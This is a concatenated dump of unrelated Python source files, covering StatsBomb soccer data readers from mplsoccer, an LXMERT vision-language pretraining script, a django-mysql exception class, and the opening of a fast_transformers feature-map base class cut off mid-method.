>>> from mplsoccer.statsbomb import read_event, EVENT_SLUG
>>> URL = f'{EVENT_SLUG}/7430.json'
>>> dict_dfs = read_event(URL)
"""
if warn:
warnings.warn(STATSBOMB_WARNING)
df_dict = {}
# read as dataframe
if type(path_or_buf).__name__ == 'Response':
df = pd.read_json(path_or_buf.content, encoding='utf-8')
match_id = int(path_or_buf.url.split('/')[-1].split('.')[0])
else:
df = pd.read_json(path_or_buf, encoding='utf-8')
match_id = int(os.path.basename(path_or_buf)[:-5])
if df.empty:
print(f'Skipping {path_or_buf}: empty json')
return None
# timestamp defaults to today's date so store as integers in separate columns
df['timestamp_minute'] = df.timestamp.dt.minute
df['timestamp_second'] = df.timestamp.dt.second
df['timestamp_millisecond'] = (df.timestamp.dt.microsecond/1000).astype(np.int64)
df.drop('timestamp', axis=1, inplace=True)
# get match id and add to the event dataframe
df['match_id'] = match_id
# loop through the columns that are still dictionary columns
# and add them as separate cols to the dataframe
# these are listed as nested dataframes in the docs - although dribbled_past/pressure aren't needed here
# also some others are needed: type, possession_team, play_pattern,
# team, tactics, player, position
dictionary_columns = ['pass', '50_50', 'bad_behaviour', 'ball_receipt', 'ball_recovery',
'block', 'carry', 'clearance', 'dribble', 'duel', 'foul_committed',
'foul_won', 'goalkeeper', 'half_end', 'half_start', 'injury_stoppage',
'interception', 'miscontrol', 'play_pattern', 'player', 'player_off',
'position', 'possession_team', 'shot', 'substitution',
'tactics', 'team', 'type']
for col in dictionary_columns:
if col in df.columns:
df = _split_dict_col(df, col)
# sort by time and reset index
df.sort_values(['minute', 'second', 'timestamp_minute',
'timestamp_second', 'timestamp_millisecond', 'possession'], inplace=True)
df.reset_index(inplace=True, drop=True)
# split location info to x, y and (z for shot) columns and drop old columns
_split_location_cols(df, 'location', ['x', 'y', 'z'])
_split_location_cols(df, 'pass_end_location', ['pass_end_x', 'pass_end_y'])
_split_location_cols(df, 'carry_end_location', ['carry_end_x', 'carry_end_y'])
_split_location_cols(df, 'shot_end_location', ['shot_end_x', 'shot_end_y', 'shot_end_z'])
_split_location_cols(df, 'goalkeeper_end_location', ['goalkeeper_end_x', 'goalkeeper_end_y'])
# replace weird * character in the type_name for ball receipt
df['type_name'] = df['type_name'].replace({'Ball Receipt*': 'Ball Receipt'})
# because some columns were contained in dictionaries they have been split into separate columns
# with different prefixes, e.g. clearance_aerial_won, pass_aerial_won, shot_aerial_won
# this combines them into one column and drops the original columns
df = _simplify_cols_and_drop(df, 'outcome_id')
df = _simplify_cols_and_drop(df, 'outcome_name')
df = _simplify_cols_and_drop(df, 'body_part_id')
df = _simplify_cols_and_drop(df, 'body_part_name')
df = _simplify_cols_and_drop(df, 'aerial_won')
df = _simplify_cols_and_drop(df, 'end_x', ['pass_end_x', 'carry_end_x',
'shot_end_x', 'goalkeeper_end_x'])
df = _simplify_cols_and_drop(df, 'end_y', ['pass_end_y', 'carry_end_y',
'shot_end_y', 'goalkeeper_end_y'])
df = _simplify_cols_and_drop(df, 'sub_type_id', ['pass_type_id', 'duel_type_id',
'goalkeeper_type_id', 'shot_type_id'])
df = _simplify_cols_and_drop(df, 'sub_type_name', ['pass_type_name', 'duel_type_name',
'goalkeeper_type_name', 'shot_type_name'])
# technique id/names are not always present so have to take this into account
technique_id_cols = ['pass_technique_id', 'goalkeeper_technique_id', 'shot_technique_id']
technique_id_cols = set(technique_id_cols).intersection(set(df.columns))
technique_name_cols = ['pass_technique_name', 'goalkeeper_technique_name',
'shot_technique_name']
technique_name_cols = set(technique_name_cols).intersection(set(df.columns))
df = _simplify_cols_and_drop(df, 'technique_id', technique_id_cols)
df = _simplify_cols_and_drop(df, 'technique_name', technique_name_cols)
# create a related events dataframe
if related_event_df:
df_related_event = _list_dictionary_to_df(df, col='related_events',
value_name='related_event',
var_name='event_related_id')
# some carries don't have the corresponding events.
# This makes sure all events are linked both ways
df_related_event.drop('event_related_id', axis=1, inplace=True)
df_related_event_reverse = df_related_event.rename({'related_event': 'id',
'id': 'related_event'}, axis=1)
df_related_event = pd.concat([df_related_event, df_related_event_reverse], sort=False)
df_related_event.drop_duplicates(inplace=True)
# and add on the type_names, index for easier lookups of how the events are related
df_event_type = df[['id', 'type_name', 'index']].copy()
df_related_event = df_related_event.merge(df_event_type, on='id',
how='left', validate='m:1')
df_event_type.rename({'id': 'related_event'}, axis=1, inplace=True)
df_related_event = df_related_event.merge(df_event_type, on='related_event',
how='left', validate='m:1',
suffixes=['', '_related'])
df_related_event.rename({'related_event': 'id_related'}, axis=1, inplace=True)
# add on match_id and add to dictionary
df_related_event['match_id'] = match_id
df_dict['related_event'] = df_related_event
# create a shot freeze frame dataframe - also splits dictionary of player details into columns
if shot_freeze_frame_df:
df_shot_freeze = _list_dictionary_to_df(df, col='shot_freeze_frame',
value_name='player', var_name='event_freeze_id')
df_shot_freeze = _split_dict_col(df_shot_freeze, 'player')
_split_location_cols(df_shot_freeze, 'player_location', ['x', 'y'])
# add on match_id and add to dictionary
df_shot_freeze['match_id'] = match_id
df_dict['shot_freeze_frame'] = df_shot_freeze
# create a tactics lineup frame dataframe
# also splits dictionary of player details into columns
if tactics_lineup_df:
df_tactic_lineup = _list_dictionary_to_df(df, col='tactics_lineup',
value_name='player', var_name='event_tactics_id')
df_tactic_lineup = _split_dict_col(df_tactic_lineup, 'player')
# add on match_id and add to dictionary
df_tactic_lineup['match_id'] = match_id
df_dict['tactics_lineup'] = df_tactic_lineup
# drop columns stored as a separate table
df.drop(['related_events', 'shot_freeze_frame', 'tactics_lineup'], axis=1, inplace=True)
# there are a few errors with through ball not always being marked in the technique name
if 'pass_through_ball' in df.columns:
df.loc[df.pass_through_ball.notnull(), 'technique_name'] = 'Through Ball'
# drop cols that are covered by other columns
# (e.g. pass technique covers through, ball, inswinging etc.)
cols_to_drop = ['pass_through_ball', 'pass_outswinging', 'pass_inswinging', 'clearance_head',
'clearance_left_foot', 'clearance_right_foot', 'pass_straight',
'clearance_other', 'goalkeeper_punched_out',
'goalkeeper_shot_saved_off_target', 'shot_saved_off_target',
'goalkeeper_shot_saved_to_post', 'shot_saved_to_post', 'goalkeeper_lost_out',
'goalkeeper_lost_in_play', 'goalkeeper_success_out',
'goalkeeper_success_in_play', 'goalkeeper_saved_to_post',
'shot_kick_off', 'goalkeeper_penalty_saved_to_post']
df.drop(cols_to_drop, axis=1, errors='ignore', inplace=True)
# rename end location
df.rename({'shot_end_z': 'end_z'}, axis=1, inplace=True)
# reorder columns so some of the most used ones are first
cols = ['match_id', 'id', 'index', 'period', 'timestamp_minute', 'timestamp_second',
'timestamp_millisecond', 'minute', 'second', 'type_id', 'type_name', 'sub_type_id',
'sub_type_name', 'outcome_id', 'outcome_name', 'play_pattern_id', 'play_pattern_name',
'possession_team_id', 'possession', 'possession_team_name', 'team_id', 'team_name',
'player_id', 'player_name', 'position_id',
'position_name', 'duration', 'x', 'y', 'z', 'end_x', 'end_y', 'end_z',
'body_part_id', 'body_part_name', 'technique_id', 'technique_name']
other_cols = df.columns[~df.columns.isin(cols)]
cols.extend(other_cols)
df = df[cols].copy()
# add to dictionary
df_dict['event'] = df
return df_dict
def read_match(path_or_buf, warn=True):
""" Extracts individual match json and loads as a pandas.DataFrame.
Parameters
----------
path_or_buf : a valid JSON str, path object or file-like object
or a requests.models.Response.
warn : bool, default True
Whether to warn about Statsbomb's data license agreement.
Returns
-------
pandas.DataFrame
Examples
--------
>>> from mplsoccer.statsbomb import read_match
>>> import os
>>> PATH_TO_EDIT = os.path.join('open-data','data','matches','11','1.json')
>>> df_match = read_match(PATH_TO_EDIT)
>>> from mplsoccer.statsbomb import read_match, MATCH_SLUG
>>> URL = f'{MATCH_SLUG}/11/1.json'
>>> df_match = read_match(URL)
"""
if warn:
warnings.warn(STATSBOMB_WARNING)
if type(path_or_buf).__name__ == 'Response':
df_match = pd.read_json(path_or_buf.content, convert_dates=['match_date', 'last_updated'])
else:
df_match = pd.read_json(path_or_buf, convert_dates=['match_date', 'last_updated'])
if df_match.empty:
print(f'Skipping {path_or_buf}: empty json')
return None
# loop through the columns that are still dictionary columns
# and add them as separate cols to the dataframe
dictionary_columns = ['competition', 'season', 'home_team', 'away_team',
'metadata', 'competition_stage', 'stadium', 'referee']
for col in dictionary_columns:
if col in df_match.columns:
df_match = _split_dict_col(df_match, col)
# convert kickoff to datetime - date + kickoff time
df_match['kick_off'] = pd.to_datetime(df_match.match_date.astype(str) + ' ' + df_match.kick_off)
# drop one gender column as always equal to the other
# drop match status as always available
df_match.drop(['away_team_gender', 'match_status'], axis=1, inplace=True)
df_match.rename({'home_team_gender': 'competition_gender'}, axis=1, inplace=True)
# manager is a list (len=1) containing a dictionary so let's split it into columns
if 'home_team_managers' in df_match.columns:
df_match['home_team_managers'] = df_match.home_team_managers.str[0]
df_match = _split_dict_col(df_match, 'home_team_managers')
df_match['home_team_managers_dob'] = pd.to_datetime(df_match['home_team_managers_dob'])
if 'away_team_managers' in df_match.columns:
df_match['away_team_managers'] = df_match.away_team_managers.str[0]
df_match = _split_dict_col(df_match, 'away_team_managers')
df_match['away_team_managers_dob'] = pd.to_datetime(df_match['away_team_managers_dob'])
# ids to integers
for col in ['competition_id', 'season_id', 'home_team_id', 'competition_stage_id']:
df_match[col] = df_match[col].astype(np.int64)
# sort and reset index: ready for exporting to feather
df_match.sort_values('kick_off', inplace=True)
df_match.reset_index(inplace=True, drop=True)
return df_match
def read_competition(path_or_buf, warn=True):
""" Extracts competition json and loads as a pandas.DataFrame.
Parameters
----------
path_or_buf : a valid JSON str, path object or file-like object
or a requests.models.Response.
warn : bool, default True
Whether to warn about Statsbomb's data license agreement.
Returns
-------
pandas.DataFrame
Examples
--------
>>> from mplsoccer.statsbomb import read_competition
>>> import os
>>> PATH_TO_EDIT = os.path.join('open-data','data','competitions.json')
>>> df_competition = read_competition(PATH_TO_EDIT)
>>> from mplsoccer.statsbomb import read_competition, COMPETITION_URL
>>> df_competition = read_competition(COMPETITION_URL)
"""
if warn:
warnings.warn(STATSBOMB_WARNING)
if type(path_or_buf).__name__ == 'Response':
df_competition = pd.read_json(path_or_buf.content, convert_dates=['match_updated',
'match_available'])
else:
df_competition = pd.read_json(path_or_buf, convert_dates=['match_updated',
'match_available'])
if df_competition.empty:
print(f'Skipping {path_or_buf}: empty json')
return None
df_competition.sort_values(['competition_id', 'season_id'], inplace=True)
df_competition.reset_index(drop=True, inplace=True)
return df_competition
def read_lineup(path_or_buf, warn=True):
""" Extracts individual lineup jsons and loads as a pandas.DataFrame.
Parameters
----------
path_or_buf : a valid JSON str, path object or file-like object
or a requests.models.Response.
warn : bool, default True
Whether to warn about Statsbomb's data license agreement.
Returns
-------
pandas.DataFrame
Examples
--------
>>> from mplsoccer.statsbomb import read_lineup
>>> import os
>>> PATH_TO_EDIT = os.path.join('open-data','data','lineups','7430.json')
>>> df_lineup = read_lineup(PATH_TO_EDIT)
>>> from mplsoccer.statsbomb import read_lineup, LINEUP_SLUG
>>> URL = f'{LINEUP_SLUG}/7430.json'
>>> df_lineup = read_lineup(URL)
"""
if warn:
warnings.warn(STATSBOMB_WARNING)
if type(path_or_buf).__name__ == 'Response':
df_lineup = pd.read_json(path_or_buf.content, encoding='utf-8')
match_id = int(path_or_buf.url.split('/')[-1].split('.')[0])
else:
df_lineup = pd.read_json(path_or_buf, encoding='utf-8')
match_id = os.path.basename(path_or_buf[:-5])
if df_lineup.empty:
print(f'Skipping {path_or_buf}: empty json')
return None
df_lineup['match_id'] = match_id
# each row has a lineup column that contains a list of player dictionaries
# we split them into separate columns and then create a new row for each player using melt
df_lineup_players = df_lineup.lineup.apply(pd.Series)
df_lineup = df_lineup.merge(df_lineup_players, left_index=True, right_index=True)
df_lineup.drop('lineup', axis=1, inplace=True)
df_lineup = df_lineup.melt(id_vars=['team_id', 'team_name', 'match_id'], value_name='player')
df_lineup.drop('variable', axis=1, inplace=True)
df_lineup = df_lineup[df_lineup.player.notnull()].copy()
df_lineup = _split_dict_col(df_lineup, 'player')
# turn ids into integers if there are no missing values
df_lineup['match_id'] = df_lineup.match_id.astype(np.int64)
df_lineup['player_id'] = df_lineup.player_id.astype(np.int64)
# sort and reset index: ready for exporting to feather
df_lineup.sort_values('player_id', inplace=True)
df_lineup.reset_index(inplace=True, drop=True)
return df_lineup
def _get_links(url):
# imports here as we don't expect these functions to be used all the time
from bs4 import BeautifulSoup
import urllib.request
response = urllib.request.urlopen(url)
soup = BeautifulSoup(response, 'html.parser',
from_encoding=response.info().get_param('charset'))
links = soup.find_all('a', href=True)
return links
def get_match_links():
""" Returns a list of links to the StatsBomb open-data match jsons."""
match_url = 'https://github.com/statsbomb/open-data/tree/master/data/matches'
match_folders = _get_links(match_url)
match_folders = [(f'https://github.com/{link["href"]}',
link['title']) for link in match_folders
if '/tree/master/data/matches' in link['href']]
match_files = []
for link, folder in match_folders:
json_links = _get_links(link)
json_links = [f'{MATCH_SLUG}/{folder}/{link["title"]}' for link in json_links
if link['href'][-4:] == 'json']
match_files.extend(json_links)
return match_files
def get_event_links():
""" Returns a list of links to the StatsBomb open-data event jsons."""
url = 'https://github.com/statsbomb/open-data/tree/master/data/events'
links = _get_links(url)
links = [f'{EVENT_SLUG}/{link["title"]}' for link in links if link['href'][-4:] == 'json']
return links
def get_lineup_links():
""" Returns a list of links to the StatsBomb open-data lineup jsons."""
url = 'https://github.com/statsbomb/open-data/tree/master/data/lineups'
links = _get_links(url)
event_files = [f'{LINEUP_SLUG}/{link["title"]}' for link in links
if link['href'][-4:] == 'json']
return event_files
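# Putting it together (illustrative only; this downloads StatsBomb open data
# over the network, so it is shown as a sketch rather than executed on import):
#   import requests
#   links = get_event_links()
#   response = requests.get(links[0])
#   dict_dfs = read_event(response)  # the readers also accept a requests Response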
|
CLIP-ViL-Pretrain/src/pretrain/lxmert_pretrain.py
|
OdedH/CLIP-ViL
| 220 |
85237
|
<reponame>OdedH/CLIP-ViL
# coding=utf-8
# Copyleft 2019 project LXRT.
import collections
import os
import random
from tqdm import tqdm
import numpy as np
import torch
import torch.nn as nn
from torch.utils.data import DataLoader
from param import args
from pretrain.lxmert_data import InputExample, LXMERTDataset, LXMERTTorchDataset, LXMERTEvaluator
from lxrt.entry import set_visual_config
from lxrt.tokenization import BertTokenizer
from lxrt.modeling import LXRTPretraining
import torch.distributed as dist
from torch.utils.data.distributed import DistributedSampler
import torch.distributed as dist
from src.tasks.vision_helpers import GroupedBatchSampler, create_aspect_ratio_groups_cache
from lxrt.visual_transformers import adjust_learning_rate
from src.tools.load_stagte_dict import load_state_dict_flexible_with_fp16, load_state_dict_flexible
import gc
try:
from apex import amp
except ImportError:
raise ImportError("Please install apex from https://www.github.com/nvidia/apex to use fp16 training.")
DataTuple = collections.namedtuple("DataTuple", 'dataset torchdset loader evaluator')
if args.distributed:
dist.init_process_group(backend='nccl')
torch.cuda.set_device(args.local_rank)
args.gpus = torch.cuda.device_count()
args.world_size = args.gpus * args.nodes
args.gpus = torch.cuda.device_count()
args.gpu = args.local_rank if args.local_rank != -1 else 0
args.device = torch.device("cuda", args.gpu)
def get_tuple(splits: str, bs: int, shuffle=False, drop_last=False, topk=-1, distributed = False, aspect_ratio_group_factor= -1) -> DataTuple:
# Decide which QA datasets would be used in pre-training.
# Options: vqa, gqa, visual7w
# Note: visual7w is a part of vgqa, we take the name here.
qa_sets = args.qa_sets
if qa_sets is not None:
qa_sets = set(qa_set.lower().strip() for qa_set in qa_sets.split(","))
# Build dataset, data loader, and evaluator.
dset = LXMERTDataset(splits, qa_sets=qa_sets)
tset = LXMERTTorchDataset(dset, topk)
if distributed:
train_sampler = DistributedSampler(
tset,
num_replicas=args.world_size,
rank=args.local_rank,
shuffle=shuffle,
)
else:
train_sampler = torch.utils.data.RandomSampler(tset)
if not shuffle:
train_sampler = torch.utils.data.SequentialSampler(tset)
if aspect_ratio_group_factor >= 0:
group_ids = create_aspect_ratio_groups_cache(tset, k=args.aspect_ratio_group_factor)
train_batch_sampler = GroupedBatchSampler(train_sampler, group_ids, bs)
else:
train_batch_sampler = torch.utils.data.BatchSampler(
train_sampler, bs, drop_last=True)
data_loader = DataLoader(
tset,
batch_sampler=train_batch_sampler,
num_workers=args.num_workers,
collate_fn=tset.collate_fn,
pin_memory=True
)
evaluator = LXMERTEvaluator(dset)
print()
return DataTuple(dataset=dset, torchdset=tset, loader=data_loader, evaluator=evaluator)
train_tuple = get_tuple(args.train, args.batch_size, shuffle=True, drop_last=True, distributed=args.distributed, aspect_ratio_group_factor = args.aspect_ratio_group_factor)
valid_batch_size = 16
valid_tuple = get_tuple(args.valid, valid_batch_size, shuffle=False, drop_last=False, topk=5000)
LOSSES_NAME = ('Mask_LM', 'Matched', 'Obj', 'Attr', 'Feat', 'QA')
def to_gpu(tensor, device = None):
if tensor is not None and isinstance(tensor, torch.Tensor):
if device is not None:
return tensor.to(device)
else:
return tensor.cuda()
return tensor
class LXMERT:
def __init__(self, max_seq_length):
super().__init__()
self.max_seq_length = max_seq_length
self.tokenizer = BertTokenizer.from_pretrained(
"bert-base-uncased",
do_lower_case=True
)
# Build model
set_visual_config(args)
self.model = LXRTPretraining.from_pretrained(
"bert-base-uncased",
task_mask_lm=args.task_mask_lm,
task_obj_predict=args.task_obj_predict,
task_matched=args.task_matched,
task_qa=args.task_qa,
visual_losses=args.visual_losses,
num_answers=train_tuple.dataset.answer_table.num_answers
)
# Weight initialization and loading
if args.from_scratch:
print("Train from Scratch: re-initialize all BERT weights.")
self.model.apply(self.model.init_bert_weights)
if args.load_lxmert is not None:
# Load lxmert would not load the answer head.
self.load_lxmert(args.load_lxmert)
#print(list(state_dict))
self.model = self.model.to(args.device)
if args.distributed:
no_decay = ["bias", "LayerNorm.weight"]
optimizer_grouped_parameters = [
{
"params": [p for n, p in self.model.named_parameters() if not any(nd in n for nd in no_decay)],
"weight_decay": args.weight_decay,
},
{
"params": [p for n, p in self.model.named_parameters() if any(nd in n for nd in no_decay)],
"weight_decay": 0.0,
},
]
from transformers import AdamW, get_linear_schedule_with_warmup
if args.use_separate_optimizer_for_visual:
from lxrt.visual_transformers import FusedOptimizer
optimizer_grouped_parameters = [
{
"params": [p for n, p in self.model.named_parameters() if ( (not any(nd in n for nd in no_decay)) and ("visual_model" not in n) ) ],
"weight_decay": args.weight_decay,
},
{
"params": [p for n, p in self.model.named_parameters() if ( (any(nd in n for nd in no_decay)) and ("visual_model" not in n ))],
"weight_decay": 0.0,
},
]
optim = AdamW(optimizer_grouped_parameters,
lr=args.lr,
#betas=(0.9, 0.98),
eps=args.adam_epsilon)
#sgd_parameters = self.model.bert.encoder.visual_model.parameters()
if args.use_adam_for_visual:
optimizer_grouped_parameters = [
{
"params": [p for n, p in self.model.bert.encoder.visual_model.named_parameters() if ( (not any(nd in n for nd in no_decay)) and ("visual_model" not in n) ) ],
"weight_decay": args.weight_decay,
},
{
"params": [p for n, p in self.model.bert.encoder.visual_model.named_parameters() if ( (any(nd in n for nd in no_decay)) and ("visual_model" not in n ))],
"weight_decay": 0.0,
},
]
sgd = AdamW(optimizer_grouped_parameters,
lr=args.sgd_lr,
#betas=(0.9, 0.98),
eps=args.adam_epsilon)
else:
sgd = torch.optim.SGD(self.model.bert.encoder.visual_model.parameters(), args.sgd_lr,
momentum=args.sgd_momentum,
weight_decay=args.sgd_weight_decay)
self.optim = FusedOptimizer([optim, sgd])
batch_per_epoch = len(train_tuple.loader)
t_total = int(batch_per_epoch * args.epochs) // args.gradient_accumulation_steps
self.scheduler = get_linear_schedule_with_warmup(
optim, num_warmup_steps=args.warmup_ratio * t_total, num_training_steps=t_total)
else:
self.optim = AdamW(optimizer_grouped_parameters,
lr=args.lr,
#betas=(0.9, 0.98),
eps=args.adam_epsilon)
batch_per_epoch = len(train_tuple.loader)
t_total = int(batch_per_epoch * args.epochs) // args.gradient_accumulation_steps
self.scheduler = get_linear_schedule_with_warmup(
self.optim, num_warmup_steps=args.warmup_ratio * t_total, num_training_steps=t_total
)
if args.fp16:
if args.use_separate_optimizer_for_visual:
self.model, [optim, sgd] = amp.initialize(self.model, self.optim.optimizers, enabled=args.fp16, opt_level=args.fp16_opt_level)
self.optim = FusedOptimizer([optim, sgd])
else:
self.model, self.optim = amp.initialize(self.model, self.optim, enabled=args.fp16, opt_level=args.fp16_opt_level)
from apex.parallel import DistributedDataParallel as DDP
self.model = DDP(self.model)
else:
self.model = torch.nn.parallel.DistributedDataParallel(
self.model, device_ids=[args.gpu], find_unused_parameters=True
)
else:
# GPU Options
if args.multiGPU:
self.model = nn.DataParallel(self.model)
# Optimizer
from lxrt.optimization import BertAdam
batch_per_epoch = len(train_tuple.loader)
t_total = int(batch_per_epoch * args.epochs)
warmup_ratio = 0.05
warmup_iters = int(t_total * warmup_ratio)
print("Batch per epoch: %d" % batch_per_epoch)
print("Total Iters: %d" % t_total)
print("Warm up Iters: %d" % warmup_iters)
self.optim = BertAdam(self.model.parameters(), lr=args.lr, warmup=warmup_ratio, t_total=t_total)
if args.load is not None:
self.load(args.load)
torch.cuda.empty_cache()
gc.collect()
def forward(self, examples):
'''train_features = [convert_example_to_features(example, self.max_seq_length, self.tokenizer)
for example in examples]
# language Inputs
input_ids = torch.tensor([f.input_ids for f in train_features], dtype=torch.long).cuda()
input_mask = torch.tensor([f.input_mask for f in train_features], dtype=torch.long).cuda()
segment_ids = torch.tensor([f.segment_ids for f in train_features], dtype=torch.long).cuda()
# Visual Inputs
feats = torch.from_numpy(np.stack([f.visual_feats[0] for f in train_features])).cuda()
pos = torch.from_numpy(np.stack([f.visual_feats[1] for f in train_features])).cuda()
# Language Prediction
lm_labels = torch.tensor([f.lm_label_ids for f in train_features], dtype=torch.long).cuda()
# Visual Prediction
obj_labels = {}
for key in ('obj', 'attr', 'feat'):
visn_labels = torch.from_numpy(np.stack([f.obj_labels[key][0] for f in train_features])).cuda()
visn_mask = torch.from_numpy(np.stack([f.obj_labels[key][1] for f in train_features])).cuda()
assert visn_labels.size(0) == visn_mask.size(0) and visn_labels.size(1) == visn_mask.size(1)
obj_labels[key] = (visn_labels, visn_mask)
# Joint Prediction
matched_labels = torch.tensor([f.is_matched for f in train_features], dtype=torch.long).cuda()
ans = torch.from_numpy(np.stack([f.ans for f in train_features])).cuda() '''
"""
forward(self, input_ids, token_type_ids=None, attention_mask=None, masked_lm_labels=None,
visual_feats=None, pos=None, obj_labels=None, matched_label=None, ans=None):
"""
new_examples = {}
for key in list(examples.keys()):
if key != "uid":
new_examples[key] = to_gpu(examples[key])
loss, losses, ans_logit = self.model(
**new_examples
)
return loss, losses.detach().cpu(), ans_logit
def valid_batch(self, batch):
with torch.no_grad():
loss, losses, ans_logit = self.forward(batch)
if args.multiGPU:
loss = loss.mean()
losses = losses.mean(0)
return loss.item(), losses.cpu().numpy(), ans_logit
def train(self, train_tuple: DataTuple, eval_tuple: DataTuple):
train_ld = train_tuple.loader
# Train
best_eval_loss = 9595.
for epoch in range(args.start_epoch, args.epochs):
# Train
self.model.train()
total_loss = 0.
total_losses = 0.
uid2ans = {}
from utils import TrainingMeter
train_meter = TrainingMeter()
if args.use_separate_optimizer_for_visual:
adjust_learning_rate(self.optim.optimizers[-1], epoch, args)
for i, batch in enumerate(tqdm(train_ld, total=len(train_ld))):
if args.skip_training and i == 4:
break
loss, losses, ans_logit = self.forward(batch)
if args.multiGPU:
loss = loss.mean()
losses = losses.squeeze(0)
if args.gradient_accumulation_steps > 1:
loss = loss / args.gradient_accumulation_steps
if args.fp16:
if args.use_separate_optimizer_for_visual:
with amp.scale_loss(loss, self.optim.optimizers) as scaled_loss:
scaled_loss.backward()
else:
with amp.scale_loss(loss, self.optim) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
if (i + 1) % args.gradient_accumulation_steps == 0:
if args.fp16:
total_norm = torch.nn.utils.clip_grad_norm_(amp.master_params(self.optim), args.max_grad_norm)
else:
total_norm = torch.nn.utils.clip_grad_norm_(self.model.parameters(), args.max_grad_norm)
self.optim.step()
if args.distributed:
self.scheduler.step() # Update learning rate schedule
self.model.zero_grad()
#self.optim.step()
loss = loss.item()
losses = losses.cpu().numpy()
logit = ans_logit
total_loss += loss
total_losses += losses
if args.task_qa:
score, label = logit.max(1)
for uid, l in zip(batch["uid"], label.cpu().numpy()):
ans = train_tuple.dataset.answer_table.id2ans(l)
uid2ans[uid] = ans
train_meter.update(
{'total_loss': loss*args.gradient_accumulation_steps,
"masked_lm": losses[0],
"matched": losses[1],
"qa_loss": losses[2] if len(losses) == 3 else 0.0,
}
)
if i != 0 and i % args.report_step == 0 and args.local_rank <= 0:
print("Epoch {}, Training Step {} of {}".format(epoch, i // args.gradient_accumulation_steps, len(train_ld) // args.gradient_accumulation_steps ))
train_meter.report()
train_meter.clean()
if i != 0 and args.save_step != -1 and (i // args.gradient_accumulation_steps) % args.save_step == 0 and args.local_rank <= 0:
self.save("Epoch{}Step{}".format(epoch+1, i // args.gradient_accumulation_steps ))
#if args.task_qa:
# train_tuple.evaluator.evaluate(uid2ans, pprint=True)
# Save
if args.local_rank <= 0:
self.save("Epoch%02d" % (epoch+1))
# Eval
#avg_eval_loss = self.evaluate_epoch(eval_tuple, iters=-1)
def evaluate_epoch(self, eval_tuple: DataTuple, iters: int=-1):
self.model.eval()
eval_ld = eval_tuple.loader
total_loss = 0.
total_losses = 0.
uid2ans = {}
for i, batch in enumerate(tqdm(eval_ld)):
loss, losses, logit = self.valid_batch(batch)
total_loss += loss
total_losses += losses
if args.task_qa:
score, label = logit.max(1)
for uid, l in zip(batch["uid"], label.cpu().numpy()):
ans = train_tuple.dataset.answer_table.id2ans(l)
uid2ans[uid] = ans
if i == iters:
break
if args.local_rank <= 0:
print("The valid loss is %0.4f" % (total_loss / len(eval_ld)))
losses_str = "The losses are "
total_losses = total_losses.squeeze(0)
for name, loss in zip(LOSSES_NAME, total_losses / len(eval_ld)):
losses_str += "%s: %0.4f " % (name, loss)
print(losses_str)
if args.task_qa:
eval_tuple.evaluator.evaluate(uid2ans, pprint=True)
return total_loss / len(eval_ld)
def save(self, name):
torch.save(self.model.state_dict(),
os.path.join(args.output, "%s_LXRT.pth" % name))
if args.use_separate_optimizer_for_visual:
torch.save(self.optim.optimizers[0].state_dict(), os.path.join(args.output, "%s_LXRT_AdamOptim.pth" % name))
torch.save(self.optim.optimizers[1].state_dict(), os.path.join(args.output, "%s_LXRT_SGDOptim.pth" % name))
else:
torch.save(self.optim.state_dict(), os.path.join(args.output, "%s_LXRT_AdamOptim.pth" % name))
torch.save(self.scheduler.state_dict(), os.path.join(args.output, "%s_LXRT_Scheduler.pth" % name))
def load(self, path):
print("Load BERT extractor from %s" % path)
state_dict = torch.load("%s_LXRT.pth" % path, map_location='cpu')
'''new_state_dict = {}
for key, value in state_dict.items():
if key.startswith("module."):
new_state_dict[key.replace("module.", "")] = value
else:
new_state_dict[key] = value'''
load_state_dict_flexible_with_fp16(self.model, state_dict)
#self.model.load_state_dict(new_state_dict)
if os.path.exists("{}_LXRT_SGDOptim.pth".format(path)):
# load sgd
print("Load SGD from {}".format("{}_LXRT_SGDOptim.pth".format(path)))
sgd_state = torch.load("{}_LXRT_SGDOptim.pth".format(path), map_location='cpu')
self.optim.optimizers[-1].load_state_dict(sgd_state)
if args.not_load_adam_optimizer:
pass
elif os.path.exists("{}_LXRT_AdamOptim.pth".format(path)):
# load adam
print("Load Adam")
adam_state = torch.load("{}_LXRT_AdamOptim.pth".format(path), map_location='cpu')
self.optim.optimizers[0].load_state_dict(adam_state)
if args.not_load_scheduler:
pass
elif os.path.exists("{}_LXRT_Scheduler.pth".format(path)):
# load scheduler
print('Load scheduler')
scheduler_state = torch.load("{}_LXRT_Scheduler.pth".format(path), map_location='cpu')
self.scheduler.load_state_dict(scheduler_state)
def load_lxmert(self, path):
print("Load LXMERT model from %s" % path)
state_dict = torch.load("%s_LXRT.pth" % path, map_location="cpu")
# Do not load any answer head
for key in list(state_dict.keys()):
if 'answer' in key:
state_dict.pop(key)
# Change Multi GPU to single GPU
new_state_dict = {}
for key, value in state_dict.items():
if key.startswith("module."):
new_state_dict[key[len("module."):]] = value
state_dict = new_state_dict
load_keys = set(state_dict.keys())
model_keys = set(self.model.state_dict().keys())
print()
print("Keys in loaded but not in model:")
for key in sorted(load_keys.difference(model_keys)):
print(key)
print()
print("Keys in model but not in loaded:")
for key in sorted(model_keys.difference(load_keys)):
print(key)
print()
load_state_dict_flexible_with_fp16(self.model, state_dict)
#self.model.load_state_dict(state_dict, strict=False)
if __name__ == "__main__":
import sys
if args.gpu == 0:
print("\n\n")
print(" ".join(sys.argv))
print("\n\n")
lxmert = LXMERT(max_seq_length=20)
lxmert.train(train_tuple, valid_tuple)
|
src/django_mysql/exceptions.py
|
harvardinformatics/django-mysql
| 502 |
85239
|
<reponame>harvardinformatics/django-mysql
class TimeoutError(Exception):
"""
Indicates a database operation timed out in some way.
"""
pass
|
fast_transformers/feature_maps/base.py
|
SamuelCahyawijaya/fast-transformers
| 1,171 |
85242
|
<filename>fast_transformers/feature_maps/base.py
#
# Copyright (c) 2020 Idiap Research Institute, http://www.idiap.ch/
# Written by <NAME> <<EMAIL>>
#
"""Create the feature map interface and some commonly used feature maps.
All attention implementations that expect a feature map shall receive a factory
function that returns a feature map instance when called with the query
dimensions.
"""
from functools import partial
import torch
from torch.nn import Module
class FeatureMap(Module):
"""Define the FeatureMap interface."""
def __init__(self, query_dims):
super().__init__()
self.query_dims = query_dims
def new_feature_map(self, device):
"""Create a new instance of this feature map. In particular, if it is a
random feature map sample new parameters."""
raise NotImplementedError()
def forward_queries(self, x):
"""Encode the queries `x` using this feature map."""
return self(x)
def forward_keys(self, x):
"""Encode the keys `x` using this feature map."""
return self(x)
def forward(self, x):
